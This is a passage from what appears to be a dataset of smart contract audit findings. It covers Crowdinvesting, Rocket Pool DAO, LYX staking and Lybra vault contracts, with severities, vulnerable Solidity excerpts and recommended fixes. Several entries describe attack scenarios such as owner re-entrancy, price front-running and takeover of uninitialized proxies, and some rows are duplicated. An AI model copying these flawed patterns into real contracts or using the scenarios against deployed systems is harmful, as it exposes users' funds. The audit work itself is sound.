submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n +Limiting the Price in the buy and onTokenTransfer Functions,medium,"When an investor tries to `buy` the tokens in the `Crowdinvesting` contract, the `buy` function does not allow to limit the amount of tokens that can be spent during this particular transaction:\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n\\nThe owner of the price oracle can front-run the transaction and twist the price.\\nOf course, the buyer can try to regulate that limit with the token allowance, but there may be some exceptions. Sometimes, users want to give more allowance and buy in multiple transactions over time. Or even give an infinite allowance (not recommended) out of convenience.\\nThe same issue can be found in the `onTokenTransfer` function. This function works differently because the amount of currency is fixed, and the amount of tokens minted is undefined. Because of that, limiting the allowance won't help, so the user doesn't know how many tokens can be bought.",It's recommended to explicitly limit the amount of tokens that can be transferred from the buyer for the `buy` function. And allow users to define a minimal amount of tokens bought in the `onTokenTransfer` function.,,"```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n" +Potential Re-Entrancy Attack in the Crowdinvesting Contract,low,"The attack requires a set of pre-requisites:\\nThe currency token should have a re-entrancy opportunity inside the token transfer.\\nThe re-entrancy can be done on a token transfer from the `_msgSender()` to the `feeCollector`, so there are not a lot of attackers who can potentially execute it.\\nThe owner should be involved in the attack, so it's most likely an attack by the owner.\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n\\nSo on the token transfer to the `feeCollector` above, the `currency` parameter can be changed by the `owner`. And the following token transfer (currency.safeTransferFrom(_msgSender(), currencyReceiver, currencyAmount - fee);) will be made in a different `currency`.\\nA possible scenario of the attack could look as follows:\\nMalicious owner sells tokens for a valuable currency. People are placing allowance for the tokens.\\nThe owner changes the currency to a new one with a much lower price and re-entrancy during transfer.\\nWhen a victim wants to buy tokens, the owner reenters on fee transfer and returns the old currency.\\nThe victim transfers the updated currency that is more expensive.",Save the currency in memory at the beginning of the function and use it further.,,"```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n" +Lack of Validation of PrivateOffer Initialization Parameters,low,"The `PrivateOffer` contract allows to create a customised deal for a specific investor. The `initialize()` function receives parameters to set up the `PrivateOffer` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenAmount`\\n`token`\\n`currency`\\n`tokenAmount`\\n```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n\\n`tokenAmount` is not validated at all. It should be verified to be greater than zero.\\n`token`\\n`token` is not validated at all. It should be verified to be different than zero address.\\n`currency`\\n`currency` is not validated at all. The documentation mentions a restricted list of supported currencies. It should be enforced by checking this parameter against a whitelist of `currency` addresses.","Enhance the validation of the following parameters: `tokenAmount`, `token`, `currency`.",,"```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n" +Lack of Validation of Crowdinvesting Initialization Parameters,low,"The `Crowdinvesting` contract allows everyone who meets the requirements to buy tokens at a fixed price. The `initialize()` function receives parameters to set up the `Crowdinvesting` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenPrice`\\n`minAmountPerBuyer`\\n`lastBuyDate`\\n`currency`\\n`tokenPrice`\\n```\\nrequire(\\_arguments.tokenPrice != 0, ""\\_tokenPrice needs to be a non-zero amount"");\\n```\\n\\n`tokenPrice` is checked to be different to zero. It should be verified to be in between `priceMin` and `priceMax` when these parameters are provided.\\n`minAmountPerBuyer`\\n```\\nrequire(\\n \\_arguments.minAmountPerBuyer <= \\_arguments.maxAmountPerBuyer,\\n ""\\_minAmountPerBuyer needs to be smaller or equal to \\_maxAmountPerBuyer""\\n);\\n```\\n\\n`minAmountPerBuyer` is checked to be below or equal to `maxAmountPerBuyer`. It should be verified to not be zero.\\n`lastBuyDate`\\n```\\nlastBuyDate = \\_arguments.lastBuyDate;\\n```\\n\\n`lastBuyDate` is not validated at all. It should be verified to be greater than the current `block.timestamp`. Currently, a `Crowdinvesting` contract with `lastBuyDate` parameter set to a value (different than zero) below `block.timestamp` will not be able to sell any token.\\n```\\nfunction \\_checkAndDeliver(uint256 \\_amount, address \\_tokenReceiver) internal {\\n require(tokensSold + \\_amount <= maxAmountOfTokenToBeSold, ""Not enough tokens to sell left"");\\n require(tokensBought[\\_tokenReceiver] + \\_amount >= minAmountPerBuyer, ""Buyer needs to buy at least minAmount"");\\n require(\\n tokensBought[\\_tokenReceiver] + \\_amount <= maxAmountPerBuyer,\\n ""Total amount of bought tokens needs to be lower than or equal to maxAmount""\\n );\\n\\n if (lastBuyDate != 0 && block.timestamp > lastBuyDate) {\\n revert(""Last buy date has passed: not selling tokens anymore."");\\n }\\n\\n tokensSold += \\_amount;\\n tokensBought[\\_tokenReceiver] += \\_amount;\\n\\n token.mint(\\_tokenReceiver, \\_amount);\\n}\\n```\\n\\n`currency`\\n```\\nrequire(address(\\_arguments.currency) != address(0), ""currency can not be zero address"");\\n```\\n\\n`currency` is checked to be different than zero. The documentation mentions a restricted list of supported currencies. It should be enforced by checking this parameter against a whitelist of `currency` addresses.","Enhance the validation of the following parameters: `tokenPrice`, `tokenPrice`, `lastBuyDate`, `currency`.",,"```\\nrequire(\\_arguments.tokenPrice != 0, ""\\_tokenPrice needs to be a non-zero amount"");\\n```\\n" +Missing Events on Important State Changes,medium,"Throughout the code base, various important settings-related state changes are not surfaced by events.\\nIn RocketDAONodeTrusted:\\n```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nIn RocketDAOProtocol:\\n```\\nfunction bootstrapSettingMulti(string[] memory _settingContractNames, string[] memory _settingPaths, SettingType[] memory _types, bytes[] memory _values) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalSettingMulti(_settingContractNames, _settingPaths, _types, _values);\\n}\\n\\n/// @notice Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nTreasury address setter:\\n```\\nfunction bootstrapTreasuryNewContract(string memory _contractName, address _recipientAddress, uint256 _amountPerPeriod, uint256 _periodLength, uint256 _startTime, uint256 _numPeriods) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalTreasuryNewContract(_contractName, _recipientAddress, _amountPerPeriod, _periodLength, _startTime, _numPeriods);\\n}\\n```\\n\\nBootstrap mode management:\\n```\\nfunction bootstrapDisable(bool _confirmDisableBootstrapMode) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n require(_confirmDisableBootstrapMode == true, ""You must confirm disabling bootstrap mode, it can only be done once!"");\\n setBool(keccak256(abi.encodePacked(daoNameSpace, ""bootstrapmode.disabled"")), true);\\n}\\n```\\n\\nOne-time treasury spends:\\n```\\nfunction bootstrapSpendTreasury(string memory _invoiceID, address _recipientAddress, uint256 _amount) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAOProtocol"", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(""rocketDAOProtocolProposals"")).proposalTreasuryOneTimeSpend(_invoiceID, _recipientAddress, _amount);\\n}\\n```\\n\\n```\\nfunction setDelegate(address _newDelegate) external override onlyRegisteredNode(msg.sender) {\\n```\\n\\n```\\nfunction proposalSettingUint(string memory _settingNameSpace, string memory _settingPath, uint256 _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingBool(string memory _settingNameSpace, string memory _settingPath, bool _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingAddress(string memory _settingNameSpace, string memory _settingPath, address _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalInvite(string calldata _id, address _memberAddress) override public onlyLatestContract(""rocketDAOProtocolProposals"", msg.sender) {\\n // Their proposal executed, record the block\\n```\\n","Resolution\\nThe client implemented a fix in commit `1be41a88a40125baf58d8904770cd9eb9e0732bb` and provided the following statement:\\nRocketDAONodeTrusted is not a contract that is getting upgrade so this won't be fixed\\nRocketDAOProtocol has been updated to include events for each bootstrap function\\nRocketNetworkVoting has been updated to emit an event\\nRocketDAOSecurityProposals has been updated to emit events for all proposals\\nWe recommend emitting events on state changes, particularly when these are performed by an authorized party. The implementation of the recommendation should be analogous to the handling of events on state changes in the rest of the system, such as in the `RocketMinipoolPenalty` contract:\\n```\\nfunction setMaxPenaltyRate(uint256 _rate) external override onlyGuardian {\\n // Update rate\\n maxPenaltyRate = _rate;\\n // Emit event\\n emit MaxPenaltyRateUpdated(_rate, block.timestamp);\\n}\\n```\\n",,"```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n" +RocketDAOProtocolProposal._propose() Should Revert if _blockNumber > block.number,medium,"Currently, the `RocketDAOProtocolProposal._propose()` function does not account for scenarios where `_blockNumber` is greater than `block.number`. This is a critical oversight, as voting power cannot be determined for future block numbers.\\n```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n",We recommend updating the function to revert on transactions where `_blockNumber` exceeds `block.number`. This will prevent the creation of proposals with undefined voting power and maintain the integrity of the voting process.,,"```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n" +Unused Parameter and Improper Parameter Sanitization in RocketNetworkVoting.calculateVotingPower(),low,"The `matchedETH` parameter in `RocketNetworkVoting.calculateVotingPower()` is unused.\\n```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(""rocketDAOProtocolSettingsNode""));\\n```\\n\\nAdditionally, the `_block` parameter is not sanitized. Thus, if calling the function with a block number `_block` where `_block >= block.number`, the call will revert because of a division-by-zero error. Indeed, `rocketNetworkSnapshots.lookupRecent` will return a `rplPrice` of zero since the checkpoint does not exist. Consequently, the function `calculateVotingPower` will revert when computing the `maximumStake`.\\n```\\nkey = keccak256(abi.encodePacked(""rpl.staked.node.amount"", _nodeAddress));\\nuint256 rplStake = uint256(rocketNetworkSnapshots.lookupRecent(key, uint32(_block), 5));\\n\\nreturn calculateVotingPower(rplStake, ethMatched, ethProvided, rplPrice);\\n```\\n\\n```\\nuint256 maximumStake = providedETH * maximumStakePercent / rplPrice;\\n```\\n","We recommend removing the unused parameter to enhance code clarity. The presence of unused parameters can lead to potential confusion for future developers. Additionally, we recommend ensuring that the snapshotted `rplPrice` value exists before it is used to compute the `maximumStake` value.",,"```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(""rocketDAOProtocolSettingsNode""));\\n```\\n" +Wrong/Misleading NatSpec Documentation,low,"The NatSpec documentation in several parts of the code base contains inaccuracies or is misleading. This issue can lead to misunderstandings about how the code functions, especially for developers who rely on these comments for clarity and guidance.\\nIn `RocketDAOProtocolProposal`, the NatSpec comments are potentially misleading:\\n```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n\\n```\\n/// @notice Returns true if this proposal was supported by this node\\n/// @param _proposalID The ID of the proposal to query\\n/// @param _nodeAddress The node operator address to query\\nfunction getReceiptDirection(uint256 _proposalID, address _nodeAddress) override public view returns (VoteDirection) {\\n return VoteDirection(getUint(keccak256(abi.encodePacked(daoProposalNameSpace, ""receipt.direction"", _proposalID, _nodeAddress))));\\n}\\n```\\n\\nIn RocketDAOProtocolVerifier, the NatSpec documentation is incomplete, which might leave out critical information about the function's purpose and behavior:\\n```\\n/// @notice Used by a verifier to challenge a specific index of a proposal's voting power tree\\n/// @param _proposalID The ID of the proposal being challenged\\n/// @param _index The global index of the node being challenged\\n```\\n",The NatSpec documentation should be thoroughly reviewed and corrected where necessary. We recommend ensuring it accurately reflects the code's functionality and provides complete information.,,```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n +RocketDAOProtocolSettingsRewards.setSettingRewardClaimPeriods() Cannot Be Invoked,low,"```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""periods"")), _periods);\\n```\\n","To make this function useful and align it with its intended purpose, we recommend integrating its functionality into `RocketDAOProtocolProposals`. In addition, we recommend that this function emit an event upon successful change of settings, enhancing the transparency of the operation.",,"```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""periods"")), _periods);\\n```\\n" +No Protection of Uninitialized Implementation Contracts From Attacker,medium,"In the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.",Invoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\n,,"```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n" +Unsafe Function receiveFees Acknowledged,low,"In the Pool contract, function `receiveFees` is used for compensate a potential penalty/slashing in the protocol by sending LYX back to the pool without minting sLYX, but the side effect is that anyone can send LYX to the pool which could mess up pool balance after all validator exited, in fact it can be replaced by a another function `receiveWithoutActivation` with access control which does the same thing.\\n```\\nfunction receiveFees() external payable override {}\\n```\\n\\n```\\nfunction receiveWithoutActivation() external payable override {\\n require(msg.sender == address(stakedLyxToken) || hasRole(DEFAULT\\_ADMIN\\_ROLE, msg.sender), ""Pool: access denied"");\\n}\\n```\\n",Remove function `receiveFees`,,```\\nfunction receiveFees() external payable override {}\\n```\\n +Unnecessary Matching in Unstake Process,low,"Function `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n","Put the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\n",,```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n +No Protection of Uninitialized Implementation Contracts From Attacker,medium,"In the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.",Invoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\n,,"```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n" +Unnecessary Matching in Unstake Process,low,"Function `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n","Put the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\n",,```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n +Re-Entrancy Risks Associated With External Calls With Other Liquid Staking Systems.,high,"As part of the strategy to integrate with Liquid Staking tokens for Ethereum staking, the Lybra Protocol vaults are required to make external calls to Liquid Staking systems.\\nFor example, the `depositEtherToMint` function in the vaults makes external calls to deposit Ether and receive the LSD tokens back. While external calls to untrusted third-party contracts may be dangerous, in this case, the Lybra Protocol already extends trust assumptions to these third parties simply through the act of accepting their tokens as collateral. Indeed, in some cases the contract addresses are even hardcoded into the contract and called directly instead of relying on some registry:\\n```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, ""ZERO\\_DEPOSIT"");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n\\nIn that case, depending on the contract, it may be known what contract is being called, and the risk may be assessed as far as what logic may be executed.\\nHowever, in the cases of `BETH` and `rETH`, the calls are being made into a proxy and a contract registry of a DAO (RocketPool's DAO) respectively.\\n```\\ncontract LybraWBETHVault is LybraPeUSDVaultBase {\\n //WBETH = 0xa2e3356610840701bdf5611a53974510ae27e2e1\\n constructor(address \\_asset, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {}\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IWBETH(address(collateralAsset)).deposit{value: msg.value}(address(configurator));\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n }\\n```\\n\\n```\\nconstructor(address \\_rocketStorageAddress, address \\_rETH, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_rETH, \\_oracle, \\_config) {\\n rocketStorage = IRocketStorageInterface(\\_rocketStorageAddress);\\n}\\n\\nfunction depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IRocketDepositPool(rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", ""rocketDepositPool"")))).deposit{value: msg.value}();\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n}\\n```\\n\\nAs a result, it is impossible to make any guarantees for what logic will be executed during the external calls. Namely, reentrancy risks can't be ruled out, and the damage could be critical to the system. While the trust in these parties isn't in question, it would be best practice to avoid any additional reentrancy risks by placing reentrancy guards. Indeed, in the `LybraRETHVault` and `LybraWbETHVault` contracts, one can see the possible damage as the calls are surrounded in a `preBalance <-> balance` pattern.\\nThe whole of third party Liquid Staking systems' operations need not be compromised, only these particular parts would be enough to cause critical damage to the Lybra Protocol.","After conversations with the Lybra Finance team, it has been assessed that reentrancy guards are appropriate in this scenario to avoid any potential reentrancy risk, which is exactly the recommendation this audit team would provide.",,"```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 